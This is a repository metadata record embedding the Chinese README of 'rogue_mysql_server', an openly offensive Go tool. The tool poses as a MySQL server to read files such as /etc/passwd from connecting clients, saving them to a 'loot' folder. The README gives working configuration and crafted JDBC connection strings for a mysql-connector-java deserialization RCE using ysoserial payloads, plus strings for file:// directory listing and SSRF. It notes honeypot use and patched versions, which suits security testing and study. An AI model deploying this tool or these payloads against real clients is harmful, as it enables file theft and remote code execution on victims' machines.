{"id":13841119,"url":"https://github.com/rmb122/rogue_mysql_server","last_synced_at":"2025-07-11T11:32:51.901Z","repository":{"id":41281531,"uuid":"274864626","full_name":"rmb122/rogue_mysql_server","owner":"rmb122","description":"A rouge mysql server supports reading files from most mysql libraries of multiple programming languages.  ","archived":false,"fork":false,"pushed_at":"2022-12-02T06:32:26.000Z","size":268,"stargazers_count":699,"open_issues_count":0,"forks_count":78,"subscribers_count":6,"default_branch":"master","last_synced_at":"2024-11-21T11:38:29.244Z","etag":null,"topics":["expliot","mysql","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rmb122.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-06-25T08:22:17.000Z","updated_at":"2024-11-12T03:18:44.000Z","dependencies_parsed_at":"2023-01-23T22:02:01.608Z","dependency_job_id":null,"html_url":"https://github.com/rmb122/rogue_mysql_server","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"purl":"pkg:github/rmb122/rogue_mysql_server","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rmb122%2Frogue_mysql_server","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rmb122%2Frogue_mysql_server/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rmb122%2Frogue_mysql_server/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rmb122%2Frogue_mysql_server/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rmb122","download_url":"https://codeload.github.com/rmb122/rogue_mysql_server/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rmb122%2Frogue_mysql_server/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264795402,"owners_count":23665231,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["expliot","mysql","vulnerability"],"created_at":"2024-08-04T17:01:02.939Z","updated_at":"2025-07-11T11:32:49.942Z","avatar_url":"https://github.com/rmb122.png","language":"Go","funding_links":[],"categories":["Go (531)","Go"],"sub_categories":[],"readme":"# Rogue Mysql Server\n\n[English README](./README_EN.md)\n\n基于 https://github.com/vitessio/vitess 实现的恶意 mysql 服务器, 支持利用漏洞从 go, php, python, java, 原生命令行等多种语言下的常见 mysql 库中读取文件.  \n远离恼人的兼容性问题, 测试过的客户端见下表\n\n| language | library                        | pass |\n|----------|--------------------------------|------|\n| go       | github.com/go-sql-driver/mysql | ✔️   |\n| php      | mysqli, pdo                    | ✔️   |\n| python   | pymysql                        | ✔️   |\n| java     | mysql-connector-java           | ✔️   |\n| native   | 10.4.13-MariaDB                | ✔️   |\n\n觉得好用可以点右上方的 🌟 支持作者\n\n## 功能\n\n* 可以兼容多种 mysql 客户端\n* 可以读取二进制文件\n* 自动保存文件\n* 作为蜜罐使用时, 可选择开启帐号密码验证\n* 读取客户端的 ConnAttr, 可能会包含一些客户端的额外信息\n* 对于 mysql-connector-java, 在可控链接串的情况下可以利用反序列化漏洞进行 RCE\n\n## 使用\n\n在当前目录下生成配置文件模版, 如果已有配置文件可以跳过这一步\n```sh\n./rogue_mysql_server -generate\n```\n\n运行服务器, 使用刚刚生成的 config.yaml\n```sh\n./rogue_mysql_server\n```\n\n或者手动指定配置路径\n```sh\n./rogue_mysql_server -config other_config.yaml\n```\n\n## 配置文件\n\n示例:\n```yaml\nhost: 0.0.0.0\nport: 3306\n# 监听的 IP 和端口.\n\nversion_string: \"10.4.13-MariaDB-log\"\n# 客户端得到的服务端版本信息.\n\nfile_list: [\"/etc/passwd\", \"C:/boot.ini\"]\nsave_path: ./loot\n# 需要读取的文件, 注意这个不意味着一次性读取列表中的所有文件 (很多客户端实现不支持这种操作).\n# 而是客户端每执行一次语句, 按照列表中的顺序读取一个文件, 并保存到 `save_path` 文件夹中.\n\nalways_read: true\n# 如果为 true, 那么不管客户端是否标记自己支持 LOAD DATA LOCAL, 都会尝试去读取文件, 否则会根据客户端的标记来决定是否读取, 避免客户端请求不同步.\n\nfrom_database_name: false\n# 如果为 true, 将会从客户端设定中的数据库名称中提取要读取的文件.\n# 例如链接串为 `jdbc:mysql://localhost:3306/%2fetc%2fhosts?allowLoadLocalInfile=true`.\n# 将会从客户端读取 `/etc/hosts` 而不会遵循 `file_list` 中的设置.\n\nmax_file_size: 0\n# 读取文件的最大大小 (单位 byte), 超过这个大小的文件内容将会被忽略. 如果 \u003c= 0, 代表没有限制.\n\nauth: false\nusers:\n  - root: root\n  - root: password\n# 对应是否开启验证, 如果为 `false`, 那么不管输什么密码或者不输入密码都可以登录.\n# 如果为 `true`, 则需要帐号密码匹配下面的设置的帐号密码中的一条.\n\njdbc_exploit: false\nalways_exploit: false\nysoserial_command:\n  cc4: [\"java\", \"-jar\", \"ysoserial-0.0.6-SNAPSHOT-all.jar\", \"CommonsCollections4\", 'touch /tmp/cc4']\n  cc7: [\"java\", \"-jar\", \"ysoserial-0.0.6-SNAPSHOT-all.jar\", \"CommonsCollections7\", 'touch /tmp/cc7']\n# 见 `jdbc 利用相关` 一节\n```\n\n## mysql-connector-java 反序列化漏洞利用相关\n\n在版本 \u003e= 8.0.20, \u003e= 5.1.49 中, 此漏洞已经被修复,  \nhttps://github.com/mysql/mysql-connector-j/commit/de7e1af306ffbb8118125a865998f64ee5b35b1b  \nhttps://github.com/mysql/mysql-connector-j/commit/13f06c38fb68757607c460789196e3f798d506f2\n\n与 mysql-connector-java 反序列化漏洞利用相关的配置如下\n```yaml\njdbc_exploit: false\nalways_exploit: false\nysoserial_command:\n  cc4: [\"java\", \"-jar\", \"ysoserial-0.0.6-SNAPSHOT-all.jar\", \"CommonsCollections4\", 'touch /tmp/cc4']\n  cc7: [\"java\", \"-jar\", \"ysoserial-0.0.6-SNAPSHOT-all.jar\", \"CommonsCollections7\", 'touch /tmp/cc7']\n```\n`jdbc_exploit` 代表这个功能开启, 在检测到客户端是 mysql-connector-j 的情况下会自动利用. 利用和读取文件只能同时开启一项, 开启利用会导致无法读取客户端的文件.  \n`always_exploit` 代表不检测客户端是否为 mysql-connector-java, 总是开启漏洞利用.  \n`ysoserial_command` 生成反序列化 payload 的命令.  \n\n可以使用连接串中的 `connectionAttributes` 选项来指定需要使用的 payload, 这个选项可以指定任意连接属性. 服务器会读取连接属性中 `t` 的值来寻找对应的 payload. 如果未指定, 则默认使用提供的所有 payload 中的第一个.  \n\n例如, 如果使用上述的示例配置:  \n在 8.x 版本下要使用 cc7, 连接串为 `jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:cc7\u0026autoDeserialize=true\u0026queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\u0026user=root\u0026password=password`\n\n另外需要注意只支持 `com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor` 的利用方法, 可以参考下表:  \n\n| version  | jdbc connection string                                                                                                                                                                                   |\n|----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n| 8.x      | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}\u0026autoDeserialize=true\u0026queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\u0026user=root\u0026password=password     |\n| 6.x      | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}\u0026autoDeserialize=true\u0026statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor\u0026user=root\u0026password=password |\n| \u003e=5.1.11 | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}\u0026autoDeserialize=true\u0026statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\u0026user=root\u0026password=password    |\n\n另外如果需要读文件, mysql-connector-java 支持使用 `file://` 列目录 (当然其他协议, 例如 http 来 SSRF 也是可以的), 但是需要在 `allowLoadLocalInfile` 为 true 之外, 额外指定 `allowUrlInLocalInfile` 为 true, 详情见[这里](https://github.com/mysql/mysql-connector-j/blob/dd61577595edad45c398af508cf91ad26fc4144f/src/main/protocol-impl/java/com/mysql/cj/protocol/a/NativeProtocol.java#L1877)  \nE.g.\n* 列 `/` 目录, `jdbc:mysql://127.0.0.1:3306/file%3A%2F%2F%2F?allowLoadLocalInfile=true\u0026allowUrlInLocalInfile=true`\n* SSRF `http://127.0.0.1:25565`, `jdbc:mysql://127.0.0.1:3306/http%3A%2F%2F127.0.0.1:25565?allowLoadLocalInfile=true\u0026allowUrlInLocalInfile=true`\n\n\n## Ref\n\nmysql-connector-java 漏洞利用:  \nhttps://github.com/fnmsd/MySQL_Fake_Server\n\nmysql 协议相关:  \nhttps://github.com/mysql/mysql-connector-j  \nhttps://github.com/vitessio/vitess  \nhttps://github.com/src-d/go-mysql-server  \nhttp://scz.617.cn:8/network/202001101612.txt  \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frmb122%2Frogue_mysql_server","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frmb122%2Frogue_mysql_server","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frmb122%2Frogue_mysql_server/lists"}